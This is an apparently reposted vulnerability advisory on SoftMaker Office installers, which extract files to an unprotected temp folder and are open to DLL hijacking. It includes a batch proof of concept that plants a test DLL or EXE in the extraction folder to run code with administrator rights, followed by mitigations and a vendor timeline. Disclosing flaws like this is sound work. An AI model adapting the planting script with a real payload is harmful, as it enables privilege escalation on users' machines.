SoftMaker Office 201x Privilege Escalation

2017.01.05
Credit: Stefan Kanthak
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

Hi @ll, the service pack installers for SoftMaker Office 201x, available from <http://www.softmaker.com/en/servicepacks-office-windows>, are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe". "%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. allows full access for the UNPRIVILEGED user. For this well-known vulnerability see <https://cwe.mitre.org/data/definitions/377.html> and <https://cwe.mitre.org/data/definitions/379.html> Due to the embedded application manifest which specifies "requireAdministrator" the executable installer can only be run with administrative rights. JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users! The UNPRIVILEGED user as well as any program running with the users credentials can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege. Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <https://capec.mitre.org/data/definitions/471.html>, <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html> <https://technet.microsoft.com/en-us/library/2269637.aspx>, <https://msdn.microsoft.com/en-us/library/ff919712.aspx> and <https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus <http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx> Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege! Proof-of-concept: ~~~~~~~~~~~~~~~~~ 0. download <http://www.softmaker.net/down/ofw16_763.exe> and save it in an arbitrary directory; 1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> alias <https://skanthak.homepage.t-online.de/sentinel.html>) and save it in an(other) arbitrary directory; 2. save the following batch script in same the directory as SENTINEL.DLL: --- OFW16_873.CMD --- :WAIT @If Not Exist "%TEMP%\7z*" Goto :WAIT For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%! Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL" Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL" Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV" --- EOF --- 3. start the batch script; 4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL. PWNED! 5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE> to the same directory as the batch script; 6. in the batch script replace the 3 lines Copy ... with Copy "SENTINEL.EXE" "%foobar%\spsetup.exe" 7. start the batch script; 8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE. PWNED! Mitigations: ~~~~~~~~~~~~ * Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <http://seclists.org/fulldisclosure/2015/Nov/101> and <http://seclists.org/fulldisclosure/2015/Dec/86> plus <http://home.arcor.de/skanthak/!execute.html> alias <https://skanthak.homepage.t-online.de/!execute.html> for more information. * Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup which use the same "%TEMP%" for unprivileged and privileged processes! * Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories". stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2016-12-15 sent vulnerability report to vendor no reply, not even an acknowledegement of receipt 2016-12-23 resent vulnerability report to vendor, cc CERT at german BSI no reply, not even an acknowledegement of receipt 2016-12-27 CERT at german BSI contacts vendor offering help no reply, not even an acknowledegement of receipt 2016-12-31 report published


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top